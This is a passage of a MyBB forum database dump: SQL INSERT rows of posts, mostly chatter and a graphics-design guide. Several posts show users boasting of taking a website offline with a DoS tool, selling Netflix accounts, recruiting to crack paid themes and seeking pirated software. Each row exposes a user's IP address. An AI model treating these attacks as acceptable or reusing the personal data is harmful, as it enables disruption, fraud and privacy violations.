that I have a slow internet connection and can\'t use SKYPE. [b]Edited[/b] By the way, what did you say in the PM \"I thought we were on a team\", I thought we were. Last time I checked, I asked you to change your usertitle and do something else which will promote LH, you replied back saying you will but did you actually do it? NO. You wana have attitude with me, I will have attitude with you. iTzIpod is always chatting with me because I know him from another forum so he is more comfortable chatting with me than chatting with others regarding issues of LH.', '41.151.156.103', '697801831', '1', '0', '1', '1346074923', '1', 'dbcf453495bcbc803b30c5428d766301', '0', '1346074923'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1123', '200', '1100', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1346074516', '[quote=\'iTzIpod\' pid=\'1100\' dateline=\'1346036935\'] [quote=\'t3h jok3r\' pid=\'1087\' dateline=\'1346018077\'] [quote=\'iTzIpod\' pid=\'871\' dateline=\'1345867049\'] [quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\'] [quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\'] Is it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc. [/quote] It\'s :opps: Ummm :thinking: Portable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it. [/quote] It\'s the normal Adobe Photoshop CS6 :p Portable takes up less space. That\'s why I want to get portable. [/quote] You sure it\'s CS6? In the title it says CS5. [/quote] Whoops :/ Made a typo. I wrote that on my Mobile. [/quote] Lol It\'s OK, I do the same thing when I\'m on my iDevice.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '9736237ec7b9b0f407252910003631c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1124', '240', '1094', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '1', 't3h jok3r', '1346074606', '[quote=\'iTzIpod\' pid=\'1094\' dateline=\'1346032320\'] [quote=\'t3h jok3r\' pid=\'1070\' dateline=\'1346014775\'] Thanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads. Mods can see it I think, because they are moderating that forum. [/quote] I can\'t see any threads in there now. [/quote] Umm, Did you create any threads there?', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '377ab5baffb7d369abdc56d503f2f757', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1125', '251', '1063', '19', '[Junk]sig', '0', '1', 't3h jok3r', '1346074969', 'This thread has been junked.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1128', '195', '1109', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1346077913', '[quote=\'NXK\' pid=\'1109\' dateline=\'1346047968\'] If you have a Canadian account let me know good sir, I can\'t use USA ones. [/quote] I have both Canadian and USA accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66c34273ec31a66ec5713bbc3fa76edd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1127', '253', '1126', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346077891', '[quote=\'HoverCatz\' pid=\'1126\' dateline=\'1346076138\'] 3. Okay ;) [/quote] 4. Made a mistake. LOL thanks for reporting me [b]BUT[/b] LQP not accepted.', '41.150.193.35', '697745699', '1', '0', '0', '0', '1', 'b5fb1aa5586cddc6d9bd1da3ec0b251a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1129', '253', '1106', '56', 'RE: Count to 200', '0', '67', 'HoverCatz', '1346078333', '5. Double Post :D', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '783e186c59835a23d4f0eb0f3120d18e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1130', '253', '1106', '56', 'RE: Count to 200', '0', '20', 'JakeUS', '1346078566', 'Six, gotta love these threads. ;)', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '142dee43e1668f3dd622fe9e830b2789', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1131', '213', '1105', '58', 'RE: What group(s) would you like to see?', '0', '82', 'iTzIpod', '1346078654', '[quote=\'Thunder™\' pid=\'1105\' dateline=\'1346045493\'] I would Love to see Gamers Group. [/quote] I think NXK is making a Gamers Group.', '24.212.197.164', '416597412', '1', '0', '82', '1346078689', '1', '30afa1dbe0c43196324f82fa58b78457', '0', '1346078689'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1132', '191', '666', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346079186', 'Can you teach me how to use this? :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2238786ee6c02129ed243a3790de2a7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1133', '29', '1114', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '82', 'iTzIpod', '1346079266', '[quote=\'t3h jok3r\' pid=\'1114\' dateline=\'1346073489\'] [quote=\'iTzIpod\' pid=\'996\' dateline=\'1345949449\'] Seems legit. Will give it a try and attempt to knock off TP.. t3h jok3r Lmfao [hr] EDIT: Works! t3h jok3r I did it! :D [img]http://i.imgur.com/4axu8.png[/img] Woot EDIT: t3h jok3r. It came back on after 3 minutes.. -.- [/quote] Congratz on the knock down. It came back up because after the site went down, the packets stopped hitting TP. So it came back up because there were no incoming attacks to keep it down. [/quote] Oh that explains it. I guess I will do it again for the lulz.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e08e0096bc590235c7befdeb8128c537', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1134', '207', '1073', '3', 'RE: Suggest awards and apply for awards', '0', '82', 'iTzIpod', '1346079447', '[quote=\'t3h jok3r\' pid=\'1073\' dateline=\'1346015422\'] I honestly don\'t think the trusted award is the best thing to implement, because some people will act decent till they get the award then scam members like shit. [/quote] True. Oh well. I\'ll erase that from the list then.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ac4b853acb27e6a440253185c6c959f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1135', '240', '1124', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '82', 'iTzIpod', '1346079560', '[quote=\'t3h jok3r\' pid=\'1124\' dateline=\'1346074606\'] [quote=\'iTzIpod\' pid=\'1094\' dateline=\'1346032320\'] [quote=\'t3h jok3r\' pid=\'1070\' dateline=\'1346014775\'] Thanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads. Mods can see it I think, because they are moderating that forum. [/quote] I can\'t see any threads in there now. [/quote] Umm, Did you create any threads there? [/quote] No. But since I am a Mod, doesn\'t that allow me to view the threads since the section is Moderated by Moderators?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa470455cf230bb0f93d551f0e6c713e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1136', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346079794', '/me makes the O_o face.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b51ef096f3ed05131088e6c7b2ce4862', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1137', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346079852', 'Banned for being an excellent Admin (t3h jok3r)', '24.212.197.164', '416597412', '1', '0', '82', '1346094144', '1', 'aa58036cd9835cd761299a47cd6e45b7', '0', '1346094144'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1138', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346079894', '7. Like le boss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e06132090076b56a46ceebf19b7db28f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1139', '256', '0', '3', '[Bug] View New Posts', '0', '82', 'iTzIpod', '1346082742', 'When you click on the \"View New Posts\" You will get this error. Sorry, but no results were returned using the query information you provided. Please redefine your search terms and try again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8ef11ff697a90f775d8bab3de6ab5035', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1140', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '112', '??????Z', '1346084890', 'can i get a copy please pal ? thanks', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', '2906c08ad810013f0827dee436bc7c9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1141', '257', '0', '35', 'Nice Video Edit', '0', '82', 'iTzIpod', '1346084981', '[video=youtube]http://www.youtube.com/watch?v=ktltmaiR4dc[/video] Enjoy! =] This is a PS3 CoD Clan. My brother is in it ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be1e2d23464096aec862df6609fc76e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1142', '258', '0', '58', 'Recurring Team now...', '0', '54', 'Sin Cara', '1346085425', 'Hello, I m going to crack some premium/custom mybb themes so that\'s why i m recurring the crack team. Everyone can apply here. [color=#006400][u][b]Basic Requirements:[/b][/u][/color] 1:- Have Knowledge of .css 2:- Have Knowledge of html 3:- Have knowledge of basic php [color=#006400][u][b]Apply Now..![/b][/u][/color] [color=#C71585][b]Your Name: Your age : You experience on mybb: You modification of mybb(Show some proofs):[/b][/color] [color=#FF0000][b]Note:[/b][/color] [color=#DAA520]This is not official. [/color]', '119.154.14.251', '2006585083', '1', '0', '54', '1346085973', '1', '904727ee9c100d057908afdbfd19218e', '0', '1346085973'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1143', '112', '1140', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1346085526', '[quote=\'Kennerz\' pid=\'1140\' dateline=\'1346084890\'] can i get a copy please pal ? thanks [/quote] PPD ebooks pack is sent... check your pm now.', '119.154.14.251', '2006585083', '1', '0', '0', '0', '1', '5f38f6e06672279475903e62062e32ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1144', '253', '1106', '56', 'RE: Count to 200', '0', '84', 'Thunder™', '1346089021', '8. Boss is Here :) :P _-_', '111.91.95.99', '1868259171', '0', '0', '0', '0', '1', '38b3ab56e5fef10fdf25929ccd790a8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1145', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346090920', '9. Thunder I like how you started this thread on TP and LH xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2af7ee11d06f73d4f514e4489ee5e844', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1146', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1346092339', 'Banned for thanks.', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', '053c89e14317c1100de8eaecae272ce0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1147', '259', '0', '34', 'Instant\'s GFX Guide', '0', '82', 'iTzIpod', '1346093539', '[B]All credits go to Instant of the BattleOn forums: [/B][url=http://forums2.battleon.com/f/tm.asp?m=18574828]Instant\'s GFX Guide[/url] If you see any Good Resources or anything Missing that should be added, PM me or Post [B][U]GFX Terms[/U][/B] [B]Sig-[/B]Also Known As Signature [B]Gfx-[/B] Also Known As Graphics [B]Gfx-ers-[/B]Also Known As Graphic Designers [B]Render-[/B] A pre-cut image from a wallpaper or other image commonly used in signatures. [B]Stock-[/B] Any un-cut image. Such as photography or a wallpaper. [B]Sprite-[/B] A render of a pixilized character. Such as ASH from the gameboy pokemon or Ryu from the SNES Street Fighter. Can be any pixelized character. [B]Focal/Focal Point-[/B] The main part of the signature/LP that people see. Most of the time it\'s your stock or render. [B]Blending-[/B] How well the Render has been fitted/matched with the background. Also how the edges of the render flow into the background. [B]Flow-[/B] The overall direction of the sig. [B]Chaotic-[/B] Too much is going on in the Signature and it is very hard to make out. [B]Vomit-[/B] A bad sig rating [B]Brush-[/B] A downloaded brush from another site commonly used to make sigs. It is used as a tool to create backgrounds. [B]Brightness/Contrast-[/B] Change the settings of your brightness and contrast in your monitor......... notice the difference thats what its referring to. When its over contrasted it means that your contrast is way overboard and it has too much excessive dark spots/black or white light spots. [B]C4D-[/B] An abstract render made in a program called Cinema 4D, also commonly used in sigs. [B]Whored-[/B] Excessive usage of a very beginner tool or such. [B]Pack-[/B] A collection of stuff. [B]Font-[/B] A different style of text. [B]Pixel Stretch-[/B] A simple sig technique using 1px by \"x[vertical wise\" of an image and stretching it across the width of the sig. [B]Blurred-[/B] Blurring duh....you know when it gets fuzzy. It\'s used for adding depth. [B]Sharpen-[/B]This tool is used to bring up the contents of your focal, by changing the quality to a more \"crisp\" like view. [B]Foreground-[/B] The front part in a signature, usually blurry, to signify it is \"too close\" for the lens, or the focus is not on it. [B]Middleground-[/B] The part of a signature/photo where the focus is, where the crisp render is, and where the focal point should be. [B]Background-[/B] The back part of the signature, usually blurry, or made to emphasise the focal point. [B]Focal point-[/B] the first point that the eye draws to, or looks at, in any piece of art. This is strongly affected by placement, depth, and sharpness. [B]Composition-[/B] How well your piece is put together. Anyone can throw a bunch of stuff onto a canvas and call it good. Not everyone can put it together to form a nice piece. [B]Ripping-[/B]Another word for plagerism. Claiming something of your own when in fact it is not your\'s. [B]Photo Manipulation/ Manip-[/B] Creating something that\'s almost surreal. Adding things that wern\'t there to begin with. (Hard to explain, I tried >< ) [B]Typography-[/B] Pretty much anything that has to do with text. [B]B&W-[/B] Black and White. [B]DP-[/B] Digital Painting. Using programs to digitally paint something. [B]Lighting/Light Source - [/B]The main source of luminance in the canvas. Lighting makes the art piece brighter. Sometimes there can be more than one light source, while other times there are none. [B]Effects - [/B]These are the parts of the signature that make it appealing and aesthetic, they are designed to aid in the flow of the sig while assisting the focal in looking good. [B]Sketch & Toon - [/B]These are C4Ds that mimic a drawing or a vector. [B]Mechanical - [/B]These are C4Ds that look mechanical or robot-like. They are not as helpful in flow as abstract freehand splines, but they are very intricate and detailed. [B]Effect Abstracts - [/B]These are C4Ds that are transparent with definitive colors and lighting. They are most often used to aid in the effects around the focal. [B]HQ/LQ- [/B] HQ stands for high quality and LQ stands for low quality. [B]Rights:[/B] If you are given \"rights\" to a resource or a piece itself, below are what you can do with these \"rights\". Not including full rights, you may not use a resource or piece to post anywhere else, edit it, or claim it as your own. All rights must have original owner\'s credit with them. When a .psd file is involved you may not use any layers of the .psd for your own projects. Only the original owner can give any type of \"right\" to you unless someone else has full rights. [B]WR/ Wearing Rights:[/B] When you are given a gift from another member, you may wear the piece in your signature or avatar space. [B]LR/ LRO/ Learning Rights-[/B] This is for a resource given by another member. You may look at it to see what they did to give you ideas of your own. [B]PR/ Posting Rights-[/B] This is also for resources. This means you can repost the resource on other sites. [B]FR/ Full Rights-[/B] You can do whatever you want except claim it as your own. You can edit, repost, take layers from a .psd file, sell it, whatever you feel like you want to do. [B]something about depth as well:[/B] Blurring something away from the sig while sharpening the focal is an example of depth. [B]something about composition:[/B] The fusion of lighting, depth and focal give the signature composition. [U][B]Other:[/B][/U] [B]LP - Large Piece.[/B] [B]Vector[/B] [B]Pentooling[/B] [B]Raster:[/B] An image entirely of individual pixels in a grid format. Most signatures are raster images. [B]Vector:[/B] The use of geometrical primitives such as points, lines, curves, and shapes or polygon(s), which are all based upon mathematical equations, to represent images in computer graphics. (Stolen from Wikipedia) To achieve a true vector, you must you a vector program such as Adobe Illustrator or Macromedia FreeHand. Photoshop does not produce true vectors. Most vector art is a compilation of shapes stacked on top of each other to form a whole. [B]Vexel:[/B] A word derived from \"vector\" and \"pixel\". It is an entirely raster based image that resembles vector style when at the correct zoom. When you zoom in, however, it will begin to look pixelated, just like any raster based image. [B]Pentooling:[/B] Using the pen tool, whether in photoshop or any other program that has one, to create lines, shapes, paths, etc. A pen tool uses vector formulas to encorporate lines, curves, and points into a path that can be filled with color to create a shape. The pen tool can also make curved lines, and gradients. Using the pen tool takes a little practice, but it\'s a lot more precise than brushing. The pen tool creates a nice, clean, solid shape. [B]Brushing:[/B] Using any of the brush tools in Photoshop to draw on a canvas, whether with a mouse, tablet, or some other method. Brushes are highly customizable, and can be used in a variety of ways. In comparison to the pen tool, brushing can add texture to a piece. [B]Expanding the definition of \"Depth\":[/B] Depth is the illusion of distance within a composition. There are several ways to do this. The most common, and easiest ways to do this in a signature are; to blur the background and sharpen the focal point, making the background darker, and others. Overlapping elements on a canvas, closer items in front of items farther away can create depth as well. Negative space, if used correctly, can make the focal appear much farther back in the piece. Making something bigger or smaller can effect how \"deep\" into the canvas it is, a big tree is closer than a small volcano. [B]Photo Manipulation:[/B] Taking a regular image and using editing techniques in order to create an illusion or deception. Like a regular picture would be some like some squeezing a sponge dry, Then the illusion of photo\'s drop nsted of water. [B][U]The Beginning[/U][/B] Alright, first off, you Need a Program. The Most common Programs used are Photoshop, and GIMP. Photoshop is very good and easier to navigate through stuff. But it is expensive. GIMP is free, and isn\'t as easy to navigate. You can get Photoshop [URL=http://adobe.com/\"]Here[/URL] and GIMP here [URL=http://gimp.org/\"]Here[/URL].Ok now that you have your GFXing programm you could start to make some tags or other art works, but i would suggest to download resources. Resources are mostly things other gfxers(sometimes already professional gfxers have created) and you can use for your own works. The resources that will be important for you at the start will be brushes, fonts and renders. [B]Some Good Sites:[/B] [URL=http://deviantART.com/\"]DeviantART[/URL] [URL=http://renders-graphiques.fr/\"]Renders-Graphiques[/URL] and [URL=http://dafont.com/\"]Dafont[/URL] [B]How to Install Brushes and Fonts?[/B] [U]GIMP[/U]: When you downloaded brushes/fonts search the main folder of your gimp programm, open that fodler. In that folder you will see a subfolder of Gimp that is called Brushes and a subfodler that is called fonts. Now you just take the brushes/fonts you downloaded and paste the downloaded bruhes in the subfolder brushes and the fonts you downloaded you paste in the subfolder fonts. Now you are able to use this brushes/fonts in Gimp. [U]Photoshop[/U]: When you download Brushes, just go to Program Files, then click on Adobe, and go down to Photoshop [Insert your version here], then click on presets and In there is a Brushes folder, just drag the brushes there. For Fonts its a bit tricker, Usually the fonts file is hidden, so you usually just have to go to Control Panel and make a shortcut on your desktop, open it, and drag the fonts there. [B][U]Types of GFX[/U][/B] Typography: [URL=http://fc08.deviantart.net/fs37/i/2010/090/3/b/Typography_by_fabianohikaru.jpg\"]click[/URL] Grunge: [URL=http://fc09.deviantart.net/fs25/f/2008/120/9/1/914c295cd99c5e3731a5c5483e8b09bb.jpg\"]click[/URL] Vector: [URL=http://fc01.deviantart.net/fs32/f/2008/214/7/b/7b15dd6575ea3cde574e6fbca3a3a2af.jpg\"]click[/URL] Abstract: [URL=http://www.deviantart.com/download/62922313/Abstract_by_DanielPimentel.jpg\"]click[/URL] C4D: [URL=http://fc03.deviantart.net/fs37/i/2008/286/0/3/Blue_C4D_Wallpaper_by_Dan4ArChAnGeL.jpg\"]click[/URL] Smudge: [URL=http://fc03.deviantart.net/fs44/i/2009/095/a/5/Smudge_Brushes_by_kirby117.png\"]click[/URL] [B]Using C4Ds and Tools[/B][I]Note: Some may not be on GIMP[/I] C4D Usage: C4Ds are Usually used for Flow or to add Depth. An Average Sig using C4Ds is [URL=http://fc02.deviantart.net/fs70/f/2010/248/6/d/free_siggie_by_instantaneousfx-d2y41tt.png\"]This[/URL] But there are some GFXers who tend to do Pieces with Just C4D, which is Fine. Pentool: Pentool is usually used for Shapes and Curves. More Expierienced GFXers like to use Pentool because they can shape it any way they want. Move Tool: Move tool allows you to move the Layer you are currently selecting. (does not work if layer is empty) Marquee Tool: Allows you select certain areas. Lasso tool: Allows you to Select specific areas. Crop Tool: Allows you to crop out Areas of a Piece. Eyedropper Tool: Allows you to Select a Certain color just by clicking on it not trying to find it Manually. Brush Tool: Allows you to brush of course. Eraser Tool: Allows you to Erase. Gradient Tool: allows you to make Gradient Maps or Overlays. Blur Tool: Blurs out Any unwanted sections, can also be used to create depth. Smudge Tool: Used many different ways, Blending, or just to make a Simple Smudge Piece. Sharpen Tool: Sharpens the Image. Dodge Tool: Makes Image Lighter. Burn Tool: Makes Image Darker. Type Tool: Puts Text on your Image Path Selection Tool: Creates Paths for you. Zoom Tool: allows you to Zoom in. [B][U]Rankings[/U][/B] [B]Low Novice [U]Novice[/U] High Novice[/B] [IMG]http://i647.photobucket.com/albums/uu191/nexolous/futuristic.png[/IMG] Someone who Just started, Who doesn\'t Execute the Basics well, but Has an Idea of what they are. [B]Low Moderate [U]Moderate[/U] High Moderate[/B] [IMG]http://i257.photobucket.com/albums/hh233/RK-I-Logic/Sigs/bscopy.png[/IMG] Someone who knows the basics but don\'t have some of them mastered just as yet, like composition. Work that show the appeal of having potential and know how to make something decent. [B]Low Intermediate [U]Intermediate[/U] High Intermediate[/B] [IMG]http://i156.photobucket.com/albums/t36/Prince_NSR/dazegift2.png[/IMG] Someone who understands and knows the basics but still have minor problems. They know how to make their work appeal as the advantage by making their work more complex. [B]Low Semi-Professional [U]Semi-Professional[/U] High Semi-Professional[/B] [IMG]http://i17.photobucket.com/albums/b98/aaron_campbell187/ON_TV.png?t=1273090654[/IMG] Someone who knows the basics and takes advantage of making their work unique with it\'s own variety of styles and complexity. [B]Low Professional [U]Professional[/U][/B] [IMG]http://i287.photobucket.com/albums/ll149/the_departed93/plus.jpg[/IMG] Someone that has a unique style and practically have their work in flawless execution and appeal. [B][U]Resources[/U][/B] [B]Fonts[/B] - [URL=http://www.dafont.com/\"]Dafont[/URL] - [URL=http://www.1001freefonts.com/\"]1001 Free Fonts[/URL] - [URL=http://www.urbanfonts.com/\"]UrbanFonts[/URL] - [URL=http://www.fontfreak.com/\"]Font Freal[/URL] - [URL=http://www.ddfont.com/\"]Ddfont[/URL] - [URL=http://www.dingbatdepot.com/\"]Dingbat Depot[/URL] - [URL=http://www.typenow.net/\"]Type Now[/URL] - [URL=http://simplythebest.net/fonts/\"]Simply The Best[/URL] [B]Font Packs[/B] -[URL=http://alpine.brainkiller.be/Resources/fonts_collectedby_delta-visions.com.rar\"]1000 Fonts Pack[/URL] -[URL=http://alpine.brainkiller.be/Resources/fonts_selectedby_delta-visions.com.rar\"]Selected 56 Fonts[/URL] [B]C4D Packs[/B] - [URL=http://www.deviantart.com/download/138311439/Bioluminescence_C4D_Pack_by_clyzm.zip\"]Biolumine scene by clyzm[/URL] - [URL=http://rapidshare.com/files/89881066/P-Series.PNGs.Trans-BG.zip\"] P-Series C4D Pack [/URL] - [URL=http://rapidshare.com/files/89760534/C4D_Pack.rar\"] 3.2-use.pack [/URL] - [URL=http://stinky666.deviantart.com/art/a-Ang-C4Ds-78159270\"] a.Ang.C4D Pack [/URL] - [URL=http://rapidshare.com/files/95648826/vL_C4D_Pack_P1.rar\"] losMac C4D Pack [/URL] - [URL=http://www.deviantart.com/download/61826816/Veshy__s_WireFrame_C4D_Pack_by_VeshyDesigns07.rar\"]WireFrame Pack[/URL] - [URL=http://www.deviantart.com/download/77148538/C4D_Effect_Pack_by_Lordsiyei.rar\"]Effect C4D pack[/URL] - [URL=http://www.deviantart.com/download/40562597/C4D_Pack_1_by_ElementalAlchemist.zip\"]Pack 1[/URL] - [URL=http://www.deviantart.com/download/128526593/Pack_c4d_effect_bubbles_by_RoseCabriolet.zip\"]Bubble Effect C4D Pack[/URL] - [URL=http://www.deviantart.com/download/36761655/CGFX_c4d_pack1.zip\"]CGFX C4D Pack[/URL] - [URL=http://www.deviantart.com/download/28900717/Final_Render_Pack_by_OldManJames.zip\"]C4D Pack2[/URL] - [URL=http://www.deviantart.com/download/118621134/MrRobin_abstract_c4d_pack_6_by_MrRoBiN.rar\"]Abstract C4D Pack[/URL] - [URL=http://www.deviantart.com/download/89849547/c4d_Supreme_Pack__32_Renders_by_00chaos8.rar\"]Supreme Pack[/URL] [B](New)[/B] - [URL=http://www.deviantart.com/download/97557716/Unique_C4D_Pack_by_stinky666.rar\"]Unique C4D Pack[/URL] - [URL=http://www.deviantart.com/download/91752059/Tamilias_c4d_Render_by_Tamilia.zip\"]Tamilias C4D Pack[/URL] - [URL=http://www.deviantart.com/download/61239702/C4D_Render_Pack_by_Rippie92.zip\"]C4D Pack3[/URL] - [URL=http://alieno.deviantart.com/art/Cinema-4D-Exclusive-Pack-81892424\"]C4D Exclusive[/URL] - [URL=http://argodream.deviantart.com/art/Abstract-3d-pack-by-argo-32089689\"]Abstract C4D Pack[/URL] - 